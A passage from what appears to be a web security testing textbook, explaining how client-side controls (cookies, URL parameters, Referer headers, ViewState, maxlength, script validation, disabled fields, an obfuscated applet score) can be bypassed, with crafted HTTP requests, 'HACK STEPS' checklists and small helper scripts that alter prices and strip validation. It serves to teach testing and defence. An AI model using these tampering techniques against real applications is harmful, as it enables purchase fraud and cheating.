quent client requests that issue them.

Consider the following variation on the previous example. When a cus-

tomer logs in to the application, she receives the following response:

HTTP/1.1 302 Found

Location: /home.asp

Set-Cookie: SessId=191041-1042

Set-Cookie: UID=1042

Set-Cookie: DiscountAgreed=25

This response sets three cookies, all of which are interesting. The first

appears to be a session token, which may be vulnerable to sequencing or other

attacks. The second appears to be a user identifier, which can potentially be

leveraged to exploit access control weaknesses. The third appears to represent

a discount rate that the customer will receive on purchases.

This third cookie points towards a classic case of relying on client-side controls

(the fact that cookies are normally unmodifiable) to protect data transmitted via

the client. If the application trusts the value of the DiscountAgreed cookie when

it is submitted back to the server, then customers can obtain arbitrary discounts

by modifying its value. For example:

POST /order.asp HTTP/1.1

Host: wahh-app.com

Cookie: SessId=191041-1042; UID=1042; DiscountAgreed=99

Content-Length: 23

quantity=1&price=1224.95
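The change made in the proxy amounts to rewriting one name/value pair inside the Cookie header. As a rough sketch (set_cookie_value is an illustrative helper, not a function of any tool named here), the edit looks like this:

```python
def set_cookie_value(cookie_header, name, new_value):
    """Return a Cookie header value with one cookie's value replaced."""
    pairs = []
    for item in cookie_header.split(";"):
        key, _, value = item.strip().partition("=")
        if key == name:
            value = new_value
        pairs.append(f"{key}={value}")
    return "; ".join(pairs)


original = "SessId=191041-1042; UID=1042; DiscountAgreed=25"
modified = set_cookie_value(original, "DiscountAgreed", "99")
print(modified)
```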

URL Parameters

Applications frequently transmit data via the client using preset URL parame-

ters. For example, when a user browses the product catalogue, the application

may provide them with hyperlinks to URLs like the following:

https://wahh-app.com/browse.asp?product=VAIOA217S&price=1224.95

When a URL containing parameters is displayed in the browser’s location

bar, any parameters can be trivially modified by any user without the use of

tools. However, there are many instances in which an application may expect

that ordinary users cannot view or modify URL parameters. For example:

■ Where embedded images are loaded using URLs containing parameters.

■ Where URLs containing parameters are used to load the contents of a frame.

■ Where a form uses the POST method and its target URL contains preset parameters.

■ Where an application uses pop-up windows or other techniques to conceal the browser location bar.

Of course, in any such case the values of any URL parameters can be modi-

fied as previously using an intercepting proxy.
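The same change can be scripted. As a minimal sketch using Python's standard urllib.parse module, the helper below (with_param is an illustrative name) rewrites a single query string parameter and leaves the rest of the URL untouched:

```python
from urllib.parse import parse_qsl, urlencode, urlsplit, urlunsplit


def with_param(url, name, value):
    """Return url with every occurrence of one query parameter set to value."""
    parts = urlsplit(url)
    query = [
        (key, value if key == name else old)
        for key, old in parse_qsl(parts.query, keep_blank_values=True)
    ]
    return urlunsplit(parts._replace(query=urlencode(query)))


original = "https://wahh-app.com/browse.asp?product=VAIOA217S&price=1224.95"
tampered = with_param(original, "price", "1")
print(tampered)
```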

The Referer Header

Browsers include the Referer header within most HTTP requests. This is used

to indicate the URL of the page from which the current request originated —

either because the user clicked a hyperlink or submitted a form, or because the

page referenced other resources such as images. Hence, it can be leveraged as

a mechanism for transmitting data via the client: because the URLs processed

by the application are within its control, developers may assume that the Referer

header can be used to reliably determine which URL generated a particular

request.

For example, consider a mechanism that enables users to reset their pass-

word if they have forgotten it. The application requires users to proceed

through several steps in a defined sequence, before they actually reset their

password’s value with the following request:

POST /customer/ResetForgotPassword.asp HTTP/1.1

Referer: http://wahh-app.com/customer/ForgotPassword.asp

Host: wahh-app.com

Content-Length: 44

uname=manicsprout&pass=secret&confirm=secret

The application may use the Referer header to verify that this request originated

from the correct stage (ForgotPassword.asp), and if so allow the user to reset

their password.

However, because the user controls every aspect of every request, including the

HTTP headers, this control can be trivially circumvented by proceeding directly to

ResetForgotPassword.asp and using an intercepting proxy to set the Referer header

to the value that the application requires.
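Any HTTP client can supply the header directly, with no browser involved. The sketch below builds the request shown earlier using Python's urllib; it is constructed only, not sent, and the Content-Type header is an assumption about what the form would submit.

```python
from urllib.request import Request

body = b"uname=manicsprout&pass=secret&confirm=secret"

# The Referer is simply a string chosen by whoever builds the request.
req = Request(
    "http://wahh-app.com/customer/ResetForgotPassword.asp",
    data=body,
    method="POST",
    headers={
        "Referer": "http://wahh-app.com/customer/ForgotPassword.asp",
        "Content-Type": "application/x-www-form-urlencoded",
    },
)

print(req.get_method(), req.full_url)
print("Referer:", req.get_header("Referer"))
print("Content-Length would be", len(body))
```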

The Referer header is strictly optional according to w3.org standards.

Hence, although most browsers implement it, using it to control application

functionality should be regarded as a “hack.”

COMMON MYTH It is often assumed that HTTP headers are somehow

more “tamper-proof” than other parts of the request, such as the URL. This

may lead developers to implement functionality that trusts the values

submitted in headers such as Cookie and Referer, while performing proper

validation of other data such as URL parameters. This perception is false —

given the multitude of intercepting proxy tools that are freely available, any

amateur hacker who targets an application can change all request data with

trivial ease. It is rather like supposing that when the teacher comes to search

your desk, it is safer to hide your water pistol in the bottom drawer, because

she will need to bend down further to discover it.

HACK STEPS

■ Locate all instances within the application where hidden form fields,

cookies, and URL parameters are apparently being used to transmit data

via the client.

■ Attempt to determine or guess the purpose that the item plays in the

application’s logic, based on the context in which it appears and on clues

such as the parameter’s name.

■ Modify the item’s value in ways that are relevant to its purpose in the

application. Ascertain whether the application processes arbitrary values

submitted in the parameter, and whether this exposes the application to

any vulnerabilities.

Opaque Data

Sometimes, data transmitted via the client is not transparently intelligible,

because it has been encrypted or obfuscated in some way. For example, instead

of seeing a product’s price stored in a hidden field, you may see some cryptic

value being transmitted:

<p>Product: Sony VAIO A217S</p>

<p>Quantity: <input size="2" name="quantity">

<input name="enc" type="hidden" value="262a4844206559224f456864206668643

265772031383932654448a352484634667233683277384f2245556533327233666455225

242452a526674696f6471">

</form>

When this is observed, you may reasonably infer that when the form is sub-

mitted, the server-side application will decrypt or deobfuscate the opaque string

and perform some processing on its plaintext value. This further processing may

be vulnerable to any kind of bug; however, in order to probe for and exploit this,

you will first need to wrap up your payload in the appropriate way.

HACK STEPS

Faced with opaque data being transmitted via the client, there are several

possible avenues of attack:

■ If you know the value of the plaintext behind the opaque string, you can

attempt to decipher the obfuscation algorithm being employed.

■ As described in Chapter 4, the application may contain functions else-

where that you can leverage to return the opaque string resulting from a

piece of plaintext you control. In this situation, you may be able to

directly obtain the required string to deliver an arbitrary payload to the

function you are targeting.

■ Even if the opaque string is completely impenetrable, it may be possible

to replay its value in other contexts, to achieve some malicious effect. For

example, the enc parameter in the previously shown form may contain

an encrypted version of the product’s price. Although it is not possible to

produce the encrypted equivalent for an arbitrary price of your choosing,

you may be able to copy the encrypted price from a different, cheaper

product and submit this in its place.

■ If all else fails, you can attempt to attack the server-side logic that will

decrypt or deobfuscate the opaque string, by submitting malformed vari-

ations of it — for example, containing overlong values, different character

sets, and the like.

The ASP.NET ViewState

One commonly encountered mechanism for transmitting opaque data via the

client is the ASP.NET ViewState. This is a hidden field that is created by default

in all ASP.NET web applications, and contains serialized information about

the state of the current page. The ASP.NET platform employs the ViewState to

enhance server performance — it enables the server to preserve elements

within the user interface across successive requests without needing to main-

tain all of the relevant state information on the server side. For example, the

server may populate a drop-down list on the basis of parameters submitted by

the user. When the user makes subsequent requests, the browser does not

submit the contents of the list back to the server. However, the browser does

submit the hidden ViewState field, which contains a serialized form of the list.

The server deserializes the ViewState and recreates the same list that is pre-

sented back to the user again.

In addition to this core purpose of the ViewState, developers can use it to

store arbitrary information across successive requests. For example, instead of

saving the product’s price in a hidden form field, an application may save it in

the ViewState as follows:

string price = getPrice(prodno);

ViewState.Add("price", price);

The form returned to the user will now look something like this:

<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE"

value="/wEPDwUKMTIxNDIyOTM0Mg8WAh4FcHJpY2UFBzEyMjQuOTVkZA==" />

<p>Product: Sony VAIO A217S</p>

<p>Quantity: <input name="quantity" id="quantity" />

</form>

and when the user submits the form, their browser will send the following:

POST /order.aspx HTTP/1.1

Host: wahh-app.com

Content-Length: 95

__VIEWSTATE=%2FwEPDwUKMTIxNDIyOTM0Mg8WAh4FcHJpY2UFBzEyMjQuOTVkZA%3D%3D&q

uantity=1&buy=Buy%21

The request apparently does not contain the product price — only the quan-

tity ordered and the opaque ViewState parameter. Changing that parameter at

random results in an error message, and the purchase is not processed.

The ViewState parameter is actually a Base64-encoded string, which can be

easily decoded:

FF 01 0F 0F 05 0A 31 32 31 34 32 32 39 33 34 32 ; ÿ.....1214229342

0F 16 02 1E 05 70 72 69 63 65 05 07 31 32 32 34 ; .....price..1224

2E 39 35 64 64 ; .95dd

TIP When you are attempting to decode what appears to be a Base64-

encoded string, a common mistake is to begin decoding at the wrong position

within the string. Because of the way Base64 encoding works, if you start at the

wrong position, the decoded string will contain gibberish. Base64 is a block-

based format in which each 4 bytes of encoded data translates into 3 bytes of

decoded data. Hence, if your attempts to decode a Base64 string do not

uncover anything meaningful, try starting from four adjacent offsets into the

encoded string. For example, cycling through the first four offsets into

Hh4aGVsbG8gd29ybGQu generates the following results:

— — [ È ÛÜ>

‡††VÆÆò v÷&Æ

á¡•±±¼ ´Y½É±

hello world.
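Cycling through the offsets is easy to automate. The sketch below trims each candidate to a whole number of 4-character blocks before decoding; decode_from_offsets is an illustrative helper name.

```python
import base64


def decode_from_offsets(encoded, offsets=range(4)):
    """Base64-decode the string starting at each offset, ignoring a ragged tail."""
    results = []
    for start in offsets:
        candidate = encoded[start:]
        # Keep only complete 4-character blocks so the decoder accepts the input.
        candidate = candidate[:len(candidate) - len(candidate) % 4]
        results.append(base64.b64decode(candidate))
    return results


for start, raw in enumerate(decode_from_offsets("Hh4aGVsbG8gd29ybGQu")):
    print(start, raw)
```

Only one of the four offsets yields readable text; the others produce the kind of noise shown above.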

There are two versions of the ViewState format, corresponding to different

versions of ASP.NET. Version 1.1 is a simple text-based format that is effec-

tively a compressed form of XML. Version 2, which is becoming more preva-

lent, is a binary format and is shown in the example. String-based data can be

easily spotted, and the decoded ViewState clearly contains the product price

that was previously stored in a hidden HTML form field. You can simply

change the value of the price parameter in a hex editor.

FF 01 0F 0F 05 0A 31 32 31 34 32 32 39 33 34 32 ; ÿ.....1214229342

0F 16 02 1E 05 70 72 69 63 65 05 01 31 64 64 ; .....price..1dd

NOTE Strings within version 2 of the ViewState are length-prepended, so

changing the price parameter from 1224.95 to 1 also requires that you change

the length byte from 7 to 1, as shown here.

You can then reencode the modified structure as Base64, and submit the

new ViewState value to the application:

POST /order.aspx HTTP/1.1

Host: wahh-app.com

Content-Length: 87

__VIEWSTATE=%2FwEPDwUKMTIxNDIyOTM0Mg8WAh4FcHJpY2UFATFkZA%3d%3d&quantity=

1&cmdBuy=Buy%21

which enables you to purchase the product at a price of 1.
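The edit and re-encoding can be scripted rather than done by hand in a hex editor. The sketch below assumes, based only on the bytes seen in this example, that a short string is stored as the byte 0x05, a one-byte length, and then the characters; it is not a general ViewState parser, and replace_short_string is a name invented for the illustration.

```python
import base64


def replace_short_string(data, old, new):
    """Swap one length-prefixed string for another, fixing up the length byte.

    Assumption: strings appear as 0x05, a one-byte length, then the bytes.
    Only strings shorter than 128 bytes are handled.
    """
    if len(old) > 127 or len(new) > 127:
        raise ValueError("only short strings are supported in this sketch")
    needle = bytes([0x05, len(old)]) + old
    if data.count(needle) != 1:
        raise ValueError("expected exactly one occurrence of the old value")
    return data.replace(needle, bytes([0x05, len(new)]) + new)


original = base64.b64decode("/wEPDwUKMTIxNDIyOTM0Mg8WAh4FcHJpY2UFBzEyMjQuOTVkZA==")
patched = replace_short_string(original, b"1224.95", b"1")
new_viewstate = base64.b64encode(patched).decode("ascii")
print(new_viewstate)
```

The output still needs to be percent-encoded before it is placed in the request body.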

Unfortunately, however, hacking ASP.NET applications is not usually as

simple as this. There is an option within ASP.NET for the platform to include a

keyed hash within the ViewState structure. This option is often on by default

but can be explicitly activated by adding the following to the page declaration:

EnableViewStateMac="true"

The EnableViewStateMac option is activated in around 90% of today’s

ASP.NET applications, meaning that the ViewState parameter cannot be

tampered with without breaking the hash. In the previous example, using this

option results in the following ViewState:

FF 01 0F 0F 05 0A 31 32 31 34 32 32 39 33 34 32 ; ÿ.....1214229342

0F 16 02 1E 05 70 72 69 63 65 05 07 31 32 32 34 ; .....price..1224

2E 39 35 64 64 C4 75 60 70 9F 10 8B 61 04 15 27 ; .95ddÄu`pŸ.‹a..’

A1 06 1E F0 35 16 F0 46 A8 ; ¡..ð5.ðF¨

The additional data after the end of the serialized form data is the keyed hash

of the preceding structure. If you now try to modify the price parameter, you

cannot create a valid hash without knowing the secret key, which is stored on the

server. Changing the price alone returns the error message shown in Figure 5-3.

Figure 5-3: ASP.NET rejects requests containing a modified ViewState

when the EnableViewStateMac option is set.
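The reason tampering fails can be illustrated with a generic keyed hash. The sketch below assumes an HMAC-SHA1 value appended to the serialized data, which is consistent with the 20 extra bytes in the dump above but is not a description of ASP.NET's actual implementation; the key and the sample state bytes are made up for the example.

```python
import hashlib
import hmac

SECRET_KEY = b"server-side-secret"  # hypothetical; known only to the server
MAC_LENGTH = 20                     # size of a SHA-1 based HMAC


def protect(serialized):
    """Append a keyed hash of the serialized state."""
    return serialized + hmac.new(SECRET_KEY, serialized, hashlib.sha1).digest()


def verify(blob):
    """Recompute the keyed hash and compare it with the one supplied."""
    serialized, mac = blob[:-MAC_LENGTH], blob[-MAC_LENGTH:]
    expected = hmac.new(SECRET_KEY, serialized, hashlib.sha1).digest()
    return hmac.compare_digest(mac, expected)


state = b"\x05\x05price\x05\x071224.95"          # illustrative fragment only
blob = protect(state)
tampered = blob.replace(b"\x05\x071224.95", b"\x05\x011")

print(verify(blob))      # untouched value
print(verify(tampered))  # price changed, hash left as it was
```

Without the key, an attacker cannot compute the hash that would match the altered data.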

Even if the ViewState parameter is properly protected to prevent tampering,

it may still contain sensitive data stored by the application that could be of use

to an attacker. You can use the ViewState deserializer in Burp Proxy to decode

and render the ViewState on any given page to identify any sensitive data it

contains, as shown in Figure 5-4.

Figure 5-4: Burp Proxy can decode and render the ViewState, allowing you to review its

contents and edit these if the EnableViewStateMac option is not set.

HACK STEPS

■ If you are attacking an ASP.NET application, verify whether the

EnableViewStateMac option is activated. This is indicated by the pres-

ence of a 20-byte hash at the end of the ViewState structure, and you can

use the decoder in Burp Proxy to confirm whether this is present.

■ Even if the ViewState is protected, decode the ViewState parameter on

various different application pages to discover whether the application is

using the ViewState to transmit any sensitive data via the client.

■ Try to modify the value of a specific parameter within the ViewState,

without interfering with its structure, and see whether an error message

results.

■ If you can modify the ViewState without causing errors, you should

review the function of each parameter within the ViewState, and whether

the application uses it to store any custom data. Try to submit crafted

values as each parameter, to probe for common vulnerabilities, as you

would for any other item of data being transmitted via the client.

■ Note that the keyed hash option may be enabled or disabled on a per-

page basis, so it may be necessary to test each significant page of the

application for ViewState hacking vulnerabilities.

Capturing User Data: HTML Forms

The other principal way in which applications use client-side controls to

restrict data submitted by clients occurs with data that was not originally spec-

ified by the server but was gathered on the client computer itself.

HTML forms are the simplest and most common mechanism for capturing

input from the user and submitting it to the server. In the most basic uses of this

method, users type data into named text fields, which are submitted to the server

as name/value pairs. However, forms can be used in other ways, which are

designed to impose restrictions or perform validation checks on the user-supplied

data. When an application employs these client-side controls as a security mech-

anism, to defend itself against malicious input, the controls can usually be triv-

ially circumvented, leaving the application potentially vulnerable to attack.

Length Limits

Consider the following variation on the original HTML form, which imposes a

maximum length of 3 on the quantity field:

<p>Product: Sony VAIO A217S</p>

<p>Quantity: <input size="2" maxlength="3" name="quantity">

</form>

Here, the browser will prevent the user from entering any more than three

characters into the input field, and so the server-side application may assume

that the quantity parameter it receives will be no longer than this. However,

the restriction can be easily circumvented either by intercepting the request

containing the form submission to enter an arbitrary value, or by intercepting

the response containing the form to remove the maxlength attribute.
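The second approach is a simple text substitution on the response body. As a rough sketch of what such a replacement rule does (the regular expression is an approximation and not a full HTML parser):

```python
import re

# Matches a maxlength attribute with a quoted or unquoted value.
MAXLENGTH = re.compile(
    r'''\s+maxlength\s*=\s*(?:"[^"]*"|'[^']*'|[^\s>]+)''',
    re.IGNORECASE,
)


def strip_maxlength(html):
    """Remove maxlength attributes so the browser no longer limits input."""
    return MAXLENGTH.sub("", html)


page = '<p>Quantity: <input size="2" maxlength="3" name="quantity">'
print(strip_maxlength(page))
```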

INTERCEPTING RESPONSES

When you are attempting to intercept and modify server responses, you may

find that the relevant message displayed in your proxy looks like this:

HTTP/1.1 304 Not Modified

Date: Wed, 21 Feb 2007 22:40:20 GMT

Etag: "6c7-5fcc0900"

Expires: Thu, 22 Feb 2007 00:40:20 GMT

Cache-Control: max-age=7200

This response arises because the browser already possesses a cached copy

of the resource it requested. When the browser requests a cached resource, it

typically adds two additional headers to the request, called If-Modified-

Since and If-None-Match:

GET /scripts/validate.js HTTP/1.1

Host: wahh-app.com

If-Modified-Since: Sat, 17 Feb 2007 19:48:20 GMT

If-None-Match: "6c7-5fcc0900"

These headers tell the server the time at which the browser last updated its

cached copy, and the Etag string, which the server provided with that copy of

the resource. The Etag is a kind of serial number that the server assigns to

each cacheable resource and that it updates each time the resource is

modified. If the server possesses a newer version of the resource than the date

specified in the If-Modified-Since header, or if the Etag of the current

version does not match the one specified in the If-None-Match header, then the

server will respond with the latest version of the resource. Otherwise, it will

return a 304 response as shown here, informing the browser that the resource

has not been modified and that the browser should use its cached copy.

When this occurs, and you need to intercept and modify the resource that

the browser has cached, you can intercept the relevant request and remove the

If-Modified-Since and If-None-Match headers, causing the server to

respond with the full version of the requested resource. Burp Proxy contains an

option to strip these headers from every request, thereby overriding all cache

information sent by the browser.
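Stripping the conditional headers is a mechanical edit to the request. The following sketch operates on a raw request string and is only an illustration of the idea, not how any particular proxy implements it:

```python
CONDITIONAL_HEADERS = {"if-modified-since", "if-none-match"}


def strip_conditional_headers(raw_request):
    """Drop cache-validation headers so the server returns the full resource."""
    head, sep, body = raw_request.partition("\r\n\r\n")
    lines = head.split("\r\n")
    kept = [lines[0]] + [
        line for line in lines[1:]
        if line.split(":", 1)[0].strip().lower() not in CONDITIONAL_HEADERS
    ]
    return "\r\n".join(kept) + sep + body


request = (
    "GET /scripts/validate.js HTTP/1.1\r\n"
    "Host: wahh-app.com\r\n"
    "If-Modified-Since: Sat, 17 Feb 2007 19:48:20 GMT\r\n"
    'If-None-Match: "6c7-5fcc0900"\r\n'
    "\r\n"
)
print(strip_conditional_headers(request))
```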

HACK STEPS

■ Look for form elements containing a maxlength attribute. Submit data

that is longer than this length but that is validly formatted in other

respects (e.g., is numeric if the application is expecting a number).

■ If the application accepts the overlong data, you may infer that the

client-side validation is not replicated on the server.

■ Depending on the subsequent processing that the application performs

on the parameter, you may be able to leverage the defects in validation

to exploit other vulnerabilities such as SQL injection, cross-site scripting,

or buffer overflows.

Script-Based Validation

The input validation mechanisms built into HTML forms themselves are

extremely simple, and are insufficiently fine-grained to perform relevant vali-

dation of many kinds of input. For example, a user registration form might

contain fields for name, email address, telephone number, and ZIP code, all of

which expect different types of input. It is therefore very common to see cus-

tomized client-side input validation implemented within scripts. Consider the

following variation on the original example:

<script>

function ValidateForm(theForm)

{

    var isInteger = /^\d+$/;

    if(!isInteger.test(theForm.quantity.value))

    {

        alert("Please enter a valid quantity");

        return false;

    }

    return true;

}

</script>

<form action="order.asp" method="post" onsubmit="return ValidateForm(this)">

<p>Product: Sony VAIO A217S</p>

<p>Quantity: <input size="2" name="quantity">

</form>

The onsubmit attribute of the form tag instructs the browser to execute the

ValidateForm function when the user clicks the submit button and to submit the

form only if this function returns true. This mechanism enables the client-side

logic to intercept an attempted form submission, perform customized validation

checks on the user’s input, and decide whether to accept that input accordingly.

In the above example, the validation is extremely simple and checks whether the

data entered in the quantity field is an integer.

Client-side controls of this kind are usually trivial to circumvent, and it is

normally sufficient to disable JavaScript within the browser. If this is done, the

onsubmit attribute is ignored, and the form is submitted without any custom

validation.

However, disabling JavaScript altogether may break the application if it

depends upon client-side scripting for its normal operation (such as construct-

ing parts of the user interface). A neater approach is to enter a benign value

into the input field in the browser, and then intercept the validated submission

with your proxy and modify the data to your desired value.

Alternatively, you can intercept the server’s response that contains the

JavaScript validation routine and modify the script to neutralize its effect — in

the previous example, by changing the ValidateForm function to return true in

every case.
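To make the bypass concrete, the sketch below mirrors the client-side check in Python and shows a second way of neutralizing it in an intercepted response: removing the onsubmit handler rather than editing the function. Both helper names are invented for the example, and the regular expression only handles double-quoted attribute values.

```python
import re


def passes_client_check(value):
    """Python equivalent of the script's /^\\d+$/ test: ASCII digits only."""
    return re.fullmatch(r"[0-9]+", value) is not None


ONSUBMIT = re.compile(r'\s+onsubmit\s*=\s*"[^"]*"', re.IGNORECASE)


def remove_onsubmit(html):
    """Strip the onsubmit handler so the form submits without validation."""
    return ONSUBMIT.sub("", html)


form_tag = '<form action="order.asp" method="post" onsubmit="return ValidateForm(this)">'
print(passes_client_check("3"), passes_client_check("-1"))
print(remove_onsubmit(form_tag))
```

A value such as -1 is blocked by the browser-side check, but nothing stops it from being sent once the handler is gone or the request is edited in transit.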

HACK STEPS

■ Identify any cases where client-side JavaScript is used to perform input

validation prior to form submission.

■ Submit data to the server that the validation would ordinarily have

blocked, either by modifying the submission request to inject invalid

data or by modifying the form validation code to neutralize it.

■ As with length restrictions, determine whether the client-side controls

are replicated on the server, and if not, whether this can be exploited for

any malicious purpose.

■ Note that if multiple input fields are subjected to client-side validation

prior to form submission, you need to test each field individually with

invalid data, while leaving valid values in all of the other fields. If you

submit invalid data in multiple fields simultaneously, it is possible that

the server will stop processing the form when it identifies the first invalid

field, and so your testing will not reach all possible code paths within

the application.
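The one-field-at-a-time approach in the last step is easy to generate programmatically. In this sketch the field names and values are hypothetical, and single_fault_cases is an illustrative helper:

```python
def single_fault_cases(valid, invalid):
    """Yield (field, form) pairs in which exactly one field holds invalid data."""
    for field, bad_value in invalid.items():
        form = dict(valid)        # start from a fully valid submission
        form[field] = bad_value   # then break just this one field
        yield field, form


valid = {"name": "Alice", "email": "alice@example.com", "zip": "12345"}
invalid = {"email": "not-an-email", "zip": "ABCDE"}

cases = list(single_fault_cases(valid, invalid))
for field, form in cases:
    print(field, form)
```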

NOTE Client-side JavaScript routines to validate user input are extremely

common in web applications but do not infer that every such application is

vulnerable. The application is exposed only if client-side validation is not

replicated on the server, and even then only if crafted input that circumvents

client-side validation can be used to cause some undesirable behavior by the

application.

In the majority of cases, client-side validation of user input has beneficial

effects on the application’s performance and the quality of the user experience.

For example, when filling out a detailed registration form, an ordinary user

might make various mistakes, such as omitting required fields or formatting

their telephone number incorrectly. In the absence of client-side validation,

correcting these mistakes may entail several reloads of the page, and round-

trip messages to the server. Implementing basic validation checks on the client

side makes the user’s experience much smoother and reduces the load on the

server.

Disabled Elements

If an element on an HTML form is flagged as disabled, it appears on-screen but

is usually grayed out and is not editable or usable in the way an ordinary con-

trol is. Also, it is not sent to the server when the form is submitted. For exam-

ple, consider the following form:

<p>Product: <input disabled="true" name="product" value="Sony VAIO A217S"></p>

<p>Quantity: <input size="2" name="quantity">

</form>

This includes the name of the product as a disabled text field and appears on-

screen as shown in Figure 5-5.

Figure 5-5: A form containing a disabled input field

The behavior of this form is identical to the original example: the only parameters

submitted are quantity and price. However, the presence of a disabled field

suggests that this parameter may originally have been used by the

application. Earlier versions of the form may have included a hidden or

editable field containing the product name. This would have been submitted

to the server and may have been processed by the application. Modifying the

name of the product may not appear to be as promising an attack as modify-

ing its price. However, if this parameter is processed, then it may be vulnera-

ble to many kinds of bugs such as SQL injection or cross-site scripting, which

are of interest to an attacker.

HACK STEPS

■ Look for disabled elements within each form of the application. When-

ever one is found, try submitting it to the server along with the form’s

other parameters, to determine whether it has any effect.

■ Often, submit elements are flagged as disabled so that buttons appear as

grayed out in contexts when the relevant action is not available. You

should always try to submit the names of these elements, to determine

whether the application performs a server-side check before attempting

to carry out the requested action.

■ Note that browsers do not include disabled form elements when forms

are submitted, and so you will not identify these if you simply walk

through the application’s functionality monitoring the requests issued by

the browser. To identify disabled elements, you need to monitor the

server’s responses or view the page source in your browser. You can also

use the automated “find and replace” function of your intercepting proxy

to remove occurrences of the disabled attribute within input tags. See

Chapter 19 for details of this feature.
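The find-and-replace rule mentioned in the last step could look something like the following sketch. The pattern is an approximation that handles the first disabled attribute in each input tag; it would also match the word inside another attribute's value, so treat it as a starting point rather than a robust HTML rewrite.

```python
import re

# Matches an <input ...> tag up to and including a disabled attribute,
# whether written bare (disabled) or with a value (disabled="true").
DISABLED = re.compile(
    r'''(<input\b[^>]*?)\s+disabled\b(?:\s*=\s*(?:"[^"]*"|'[^']*'|[^\s>]+))?''',
    re.IGNORECASE,
)


def enable_inputs(html):
    """Remove the disabled attribute so the browser submits the field."""
    return DISABLED.sub(r"\1", html)


page = '<p>Product: <input disabled="true" name="product" value="Sony VAIO A217S"></p>'
print(enable_inputs(page))
```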

Capturing User Data: Thick-Client Components

Besides HTML forms, the other main method for capturing, validating, and

submitting user data is to use a thick-client component. The technologies you

are most likely to encounter here are Java applets, ActiveX controls, and

Shockwave Flash objects.

Thick-client components can capture data in various different ways, both via

input forms and in some cases by interacting with the client operating system’s

file system or registry. They can perform arbitrarily complex validation and

manipulation of captured data prior to submission to the server. Further,

because their internal workings are less transparently visible than HTML forms

and JavaScript, developers are more likely to assume that the validation they

perform cannot be circumvented. For this reason, thick-client components are

often a fruitful means of discovering vulnerabilities within web applications.

NOTE Whatever validation and processing a thick-client component performs,

if it submits data to the server in a transparent manner, then this data can be

modified using an intercepting proxy in just the same way as described for HTML

form data. For example, a thick-client component supporting an authentication

mechanism might capture user credentials, perform some validation on these,

and submit the values to the server as plaintext parameters within the request.

The validation can be trivially circumvented without performing any analysis or

attack on the component itself.

Thick-client components present a more interesting and challenging target

when the data they capture is obfuscated in some manner before being

transmitted to the server. In this situation, modifying the submitted values

will typically break the obfuscation and so will be rejected by the server.

To circumvent the validation, it is necessary to look inside the thick-client

component itself, understand the validation and obfuscation it performs,

and subvert its processing in some way so as to achieve your objective.

Java Applets

Java applets are a popular choice of technology for implementing thick-client

components because they are cross-platform and they run in a sandboxed

environment, which mitigates various kinds of security problems that

can afflict more heavyweight thick-client technologies.

As a result of running in a sandbox, Java applets cannot normally access

operating system resources such as the file system. Hence, their main use as a

client-side control is to capture user input or other in-browser information.

Consider the following extract of HTML source, which loads a Java applet con-

taining a game:

<script>

function play()

{

    alert("you scored " + TheApplet.getScore());

    document.location = "submitScore.jsp?score=" +

        TheApplet.getObsScore() + "&name=" +

        document.playForm.yourName.value;

}

</script>

<p>Enter name: <input type="text" name="yourName" value=""></p>

</form>

<applet code="https://wahh-game.com/JavaGame.class"

id="TheApplet"></applet>

In this code, the applet tag instructs the browser to load a Java applet from

the specified URL and instantiate it with the name TheApplet. When the user clicks

the Play button, a JavaScript routine executes that invokes the getScore method of

the applet. This is when the actual game play takes place, after which the score is

displayed in an alert dialog. The script then invokes the getObsScore method of the

applet, and submits the returned value as a parameter to the submitScore.jsp URL,

together with the name entered by the user.

For example, playing the game results in a dialog like the one shown in Fig-

ure 5-6, followed by a request for a URL with this form:

https://wahh-game.com/submitScore.jsp?score=c1cc3139323c3e4544464d51515352585a61606a6b&name=daf

which generates an entry in the high-scores table with a value of 38.

Figure 5-6: A dialog produced when

the applet-based game is played

It appears, therefore, that the long string that is returned by the getObsScore

method, and submitted in the score parameter, contains an obfuscated repre-

sentation of your score. If you want to cheat the game and submit an arbitrary

high score, you will need to figure out a way of correctly obfuscating your cho-

sen score, so that it is decoded in the normal way by the server.

One approach you may consider is to harvest a large number of scores

together with their obfuscated equivalents, and attempt to reverse engineer

the obfuscation algorithm. However, suppose that you play the game several
times, always scoring 38, and observe the following values being submitted:

bb58303981393b424d4a5059575c616a676d72757b818683

5f48303981393b41474951585861606a656f6f7377817f828b

fd20303981393b4149495651555c66686a6c73797680848489

370c303981393b42494a505359606361696e76787b828584

b5bc303981393b454549545a5a5e6365656971717d818388

1744303981393b43464d515a585f5f646b6f7477767f7e86

f3d4303981393b494a4b5653556162616e6d6f7577827e

de08303981393b474a4d5357595b5d69676a7178757b

da40303981393b43464b54545b6060676e6d70787e7b7e85

1aec303981393b434d4b5054556266646c6b6e717a7f80

Each time you submit a score of 38, a portion of the obfuscated string
remains constant, but the majority of it changes in unpredictable ways. You
also find that if you modify any part of the obfuscated score, the server
rejects it. Attempting to reverse engineer the algorithm based on observed
values could be a very difficult task.
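One way to make this comparison concrete is to line up the captured values and see which characters never change. The following is a minimal sketch in Java, assuming you have pasted the captured values into a list; the class and method names are hypothetical and are not part of the game.

```java
import java.util.List;

/** Illustrative helper (hypothetical names): finds the part of several captured values that never changes. */
final class SampleComparer {

    /**
     * Returns the longest run of characters, starting at offset skip,
     * that is identical in every sample.
     */
    static String commonRun(List<String> samples, int skip) {
        String first = samples.get(0);
        int end = skip;
        while (end < first.length()) {
            char c = first.charAt(end);
            boolean same = true;
            for (String s : samples) {
                if (end >= s.length() || s.charAt(end) != c) {
                    same = false;
                    break;
                }
            }
            if (!same) {
                break;
            }
            end++;
        }
        return first.substring(skip, end);
    }

    public static void main(String[] args) {
        // Three of the values observed when scoring 38.
        List<String> samples = List.of(
            "bb58303981393b424d4a5059575c616a676d72757b818683",
            "5f48303981393b41474951585861606a656f6f7377817f828b",
            "fd20303981393b4149495651555c66686a6c73797680848489");
        // The first four hex digits differ between samples, so skip them.
        System.out.println(commonRun(samples, 4));
    }
}
```

For these three samples the stable run begins with 303981393b, which is the portion that stays constant whenever the score is 38. Everything before and after it varies, which is why guessing the algorithm from samples alone is unattractive.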

NOTE The idea of attacking a Java-based game to submit an arbitrary score
may appear frivolous. However, thick-client components are employed by many
casino web sites, where users play for real money. Posting an arbitrary score
to an application like this may be a very serious business!

Decompiling Java Bytecode

A much more promising approach is to decompile the applet to obtain its

source code. Languages like Java are not compiled into native machine

instructions, but to an intermediate language called bytecode, which is inter-

preted at runtime by a virtual machine. Normally, Java bytecode can be

decompiled to recover its original source code without too many problems.

To decompile a client-side applet, you first need to save a copy of it to disk.
You can do this simply by using your browser to request the URL specified in
